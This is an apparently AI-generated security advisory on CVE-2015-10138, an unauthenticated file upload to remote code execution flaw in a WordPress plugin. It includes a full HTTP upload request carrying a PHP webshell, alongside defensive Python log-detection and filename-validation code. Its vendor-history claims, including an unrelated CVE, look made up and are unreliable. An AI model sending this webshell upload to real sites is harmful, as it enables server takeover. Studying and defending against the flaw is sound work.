WordPress Work The Flow File Upload (CVE-2015-10138): Unauthenticated Arbitrary File Upload to RCE

A critical flaw in the Work The Flow File Upload plugin for WordPress (≤2.5.2) enables unauthenticated attackers to upload arbitrary files, leading to remote code execution. This post delivers a technical breakdown, PoC, and actionable intelligence for defenders.
CVE Analysis

ZeroPath Security Research

2025-07-19

Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

When a single HTTP request can grant an attacker full control of your WordPress site, the stakes are clear. CVE-2015-10138 is a textbook example of how a simple file upload flaw can escalate to remote code execution (RCE) and complete server compromise. In this post, we dissect the vulnerability, walk through a real-world proof of concept, and provide actionable intelligence for defenders and incident responders.


Introduction

The Work The Flow File Upload plugin, though not a household name, was used on over a thousand WordPress sites at its peak. Designed to simplify file uploads for end-users, it instead opened the door to unauthenticated arbitrary file uploads due to a critical flaw in its jQuery-File-Upload-9.5.0 component. This vulnerability (CVE-2015-10138) allowed attackers to upload and execute malicious files—most notably, PHP webshells—without any authentication, making it a prime target for mass exploitation campaigns and automated attack tools.

About the Plugin:

  • Work The Flow File Upload: A WordPress plugin aimed at providing user-friendly file upload capabilities. At its peak, it had ~1,000 active installations. Its impact is outsized by the severity of this flaw, as any site running a vulnerable version is at risk of total compromise.

Technical Information

Vulnerability Mechanism

The vulnerability is rooted in the plugin's bundled jQuery-File-Upload-9.5.0 library. The server-side PHP handler at:

/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

fails to enforce file type validation and does not require authentication. As a result, any remote user can upload arbitrary files—including executable PHP scripts—directly to the server.

Key Technical Weaknesses:

  • No File Type Validation: The upload handler does not restrict file extensions or validate MIME types. Attackers can upload .php files or other executable content.
  • Unauthenticated Access: No authentication or authorization checks are performed on the upload endpoint.
  • Predictable Storage Path: Uploaded files are placed in a known directory: /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/

Exploitation Flow

  1. Crafted HTTP POST: The attacker sends a multipart/form-data POST request to the vulnerable endpoint, specifying a malicious file (e.g., shell.php).
  2. File Upload: The server saves the file in the predictable directory, accessible via the web.
  3. Remote Execution: The attacker accesses the uploaded PHP file via the browser or a direct HTTP request, executing arbitrary code on the server.
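The three steps above leave a recognisable trail in the web server's access log: a POST to the upload handler, then a GET for a script under the files/ directory. The detector below is an added example written for this write-up, not tooling from the plugin or the advisory; it assumes Apache/nginx combined-format log lines and uses a constructed sample log.

```python
import re

# Paths taken from the advisory above.
BASE = ("/wp-content/plugins/work-the-flow-file-upload/public/assets/"
        "jQuery-File-Upload-9.5.0/server/php/")
UPLOAD_ENDPOINT = BASE + "index.php"
UPLOAD_DIR = BASE + "files/"
# Extensions a typical PHP host will execute (assumed deny-set).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Combined log format: ip ident user [timestamp] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one client uploads and then executes a webshell,
# another client legitimately fetches a PDF from the same directory.
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [19/Jul/2025:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [19/Jul/2025:10:01:05 +0000] "POST {UPLOAD_ENDPOINT} HTTP/1.1" 200 86',
    f'203.0.113.7 - - [19/Jul/2025:10:01:06 +0000] "GET {UPLOAD_DIR}shell.php?cmd=id HTTP/1.1" 200 64',
    f'198.51.100.9 - - [19/Jul/2025:10:05:00 +0000] "GET {UPLOAD_DIR}report.pdf HTTP/1.1" 200 9000',
])

def detect(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, finding, path) for every line matching the exploitation flow."""
    findings = []
    uploaders = set()   # clients that have hit the unauthenticated upload endpoint
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target = m["ip"], m["method"], m["target"]
        path = target.split("?", 1)[0]          # drop the query string (e.g. ?cmd=id)
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        if method == "POST" and path == UPLOAD_ENDPOINT:
            # Step 1/2: any POST here is suspect, since the handler requires no auth.
            uploaders.add(ip)
            findings.append((ip, "unauthenticated_upload_attempt", path))
        elif path.startswith(UPLOAD_DIR) and ext in EXECUTABLE_EXTS:
            # Step 3: a script served from the upload directory is the RCE step;
            # a preceding upload from the same client makes it near-certain.
            kind = "webshell_execution_after_upload" if ip in uploaders else "webshell_execution"
            findings.append((ip, kind, path))
    return findings
```

Any hit on the second branch warrants treating the host as compromised and pulling the files/ directory for forensic review, regardless of the HTTP status code.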

Example HTTP Request

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1
Host: victim-site.com
Content-Type: multipart/form-data; boundary=---------------------------123456789123456

-----------------------------123456789123456
Content-Disposition: form-data; name="files[]"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
-----------------------------123456789123456--

Root Cause

The root cause is the absence of both server-side file type validation and authentication. The upload handler trusts user input, allowing attackers to bypass any client-side restrictions and upload executable files.
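To make the missing server-side check concrete, the following added example (not code from the plugin or the advisory) parses the multipart request shown above, pulls out every uploaded filename, and applies the validation the handler should have performed. The extension allowlist is an assumed policy for a generic document-upload form; the sample request is reconstructed from the one above with CRLF line endings.

```python
import email
from email import policy

BOUNDARY = b"---------------------------123456789123456"
DELIM = b"--" + BOUNDARY          # multipart delimiter lines are "--" + boundary

# Constructed sample: the advisory's upload request as it would cross the wire.
RAW_REQUEST = (
    b"POST /wp-content/plugins/work-the-flow-file-upload/public/assets/"
    b"jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1\r\n"
    b"Host: victim-site.com\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
    b"\r\n"
    + DELIM + b"\r\n"
    b'Content-Disposition: form-data; name="files[]"; filename="shell.php"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"<?php system($_GET['cmd']); ?>\r\n"
    + DELIM + b"--\r\n"
)

# Extensions a PHP host may execute (assumed deny-set) and what this upload
# form is assumed to legitimately need (assumed allowlist).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

def uploaded_filenames(raw_request: bytes) -> list[str]:
    """Return the filename= value of every file part in a multipart/form-data POST."""
    _, _, message = raw_request.partition(b"\r\n")   # strip the request line; the rest is RFC 822-like
    msg = email.message_from_bytes(message, policy=policy.default)
    return [part.get_filename() for part in msg.walk() if part.get_filename()]

def filename_verdict(name: str) -> str:
    """'allow' or 'reject': the check the vulnerable handler never made."""
    name = name.split("\x00")[0].lower().strip(". ")  # defeat null-byte and trailing-dot tricks
    segments = name.split(".")
    if len(segments) < 2:
        return "reject"                                # no extension (also catches ".htaccess")
    exts = segments[1:]
    if any(e in EXECUTABLE_EXTS for e in exts):        # rejects shell.php and shell.php.jpg alike
        return "reject"
    return "allow" if exts[-1] in ALLOWED_EXTS else "reject"

def inspect_upload(raw_request: bytes) -> dict[str, str]:
    """Map each filename in the request to its verdict."""
    return {n: filename_verdict(n) for n in uploaded_filenames(raw_request)}
```

Checking every dot-separated segment, not just the last one, matters because some Apache configurations will still hand shell.php.jpg to the PHP interpreter.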


Proof of Concept

The Metasploit module wp_worktheflow_upload.rb targets this vulnerability by automating the attack:

  • It sends a specially crafted HTTP POST request to the plugin's upload endpoint.
  • The request includes a malicious PHP file disguised as an allowed file type.
  • Upon successful upload, the module accesses the file to trigger remote code execution, providing a shell to the attacker.

Attack Steps:

  1. Set the target URL and payload path in Metasploit.
  2. Run the module; it uploads the payload and executes it, granting remote shell access.

This exploit is possible due to the lack of file type validation and authentication in the upload handler.

Reference: Metasploit Module Source


Affected Systems and Versions

  • Product: Work The Flow File Upload plugin for WordPress
  • Affected Versions: Up to and including 2.5.2
  • Vulnerable Component: jQuery-File-Upload-9.5.0 within the plugin
  • Vulnerable Endpoint: /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
  • Configuration: All default installations of affected versions are vulnerable; no special configuration is required.

Vendor Security History

  • Previous Vulnerabilities: The vendor has a history of critical flaws, including CVE-2014-7840 (file upload bypass) and unpatched high-severity issues.
  • Patch Response: Patch delays ranged from several days to weeks. The fix for CVE-2015-10138 was released in version 2.5.3.
  • Security Maturity: The vendor relied on outdated third-party libraries and ceased maintenance after acquisition, leaving legacy installs exposed.

References

Source: This report was created using AI

If you have suggestions for improvement or feedback, please reach out to us at [email protected]